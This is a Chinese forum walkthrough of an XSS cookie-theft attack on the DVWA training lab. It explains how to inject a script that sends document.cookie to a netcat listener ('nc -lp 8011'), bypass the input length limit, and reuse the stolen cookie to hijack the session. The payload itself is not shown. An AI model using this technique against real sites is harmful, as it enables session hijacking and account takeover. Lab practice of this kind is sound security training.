IT评测·应用市场-qidao123.com

标题: XSS cookie伪造攻击 [打印本页]

作者: 欢乐狗    时间: 2023-6-13 20:31
标题: XSS cookie伪造攻击
环境

系统:windows 7
靶场:DVWA
场景:chrome对firefox的个人cookie盗用伪造
IP:192.168.98.128
端口:未占用的任意端口  [1024-49151]
实施

1.首先确保firefox登录状态,即存在cookie

2.构造获取cookie的js请求脚本
  1. //因为src=“”中引号内容只会作为数据字符串进行展示,所以需引进script脚本去执行document.cookie。对标签和执行内容进行‘单引号’分隔和【数据+指令+数据】的拼接
复制代码
原理:构造一个访问请求来盗取浏览器页面的cookie
3.提交执行脚本
在任意输入框进行提交,注意绕过前端输入长度限制


4.进行nc端口监听
nc  -lp  8011
 注:此处须保持与构造请求的端口一致!!

5.替换cookie实现伪造盗用

6.实现登录
此处并不是直接刷新页面,因为其登录页面是固定的,我们要通过cookie的盗用直接获取其登录状态,因此此处访问的应该是首页
http://127.0.0.1:8082

 可以看到成功进入DVWA的页面,攻击完成。
TRANSLATE with <img id="FloaterLogo"> x  English
ArabicHebrewPolish
BulgarianHindiPortuguese
CatalanHmong DawRomanian
Chinese SimplifiedHungarianRussian
Chinese TraditionalIndonesianSlovak
CzechItalianSlovenian
DanishJapaneseSpanish
DutchKlingonSwedish
EnglishKoreanThai
EstonianLatvianTurkish
FinnishLithuanianUkrainian
FrenchMalayUrdu
GermanMalteseVietnamese
GreekNorwegianWelsh
Haitian CreolePersian 
<img alt="" ><img id="HelpImg"> <img id="EmbedImg"> <img id="ShareImg">  TRANSLATE with <img id="CollapsedLogoImg"> COPY THE URL BELOW    <img id="EmailImg"> <img id="ShareHelpImg"> Back  EMBED THE SNIPPET BELOW IN YOUR SITE  <img id="EmbedHelpImg">Enable collaborative features and customize widget: Bing Webmaster PortalBack
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!




欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/) Powered by Discuz! X3.4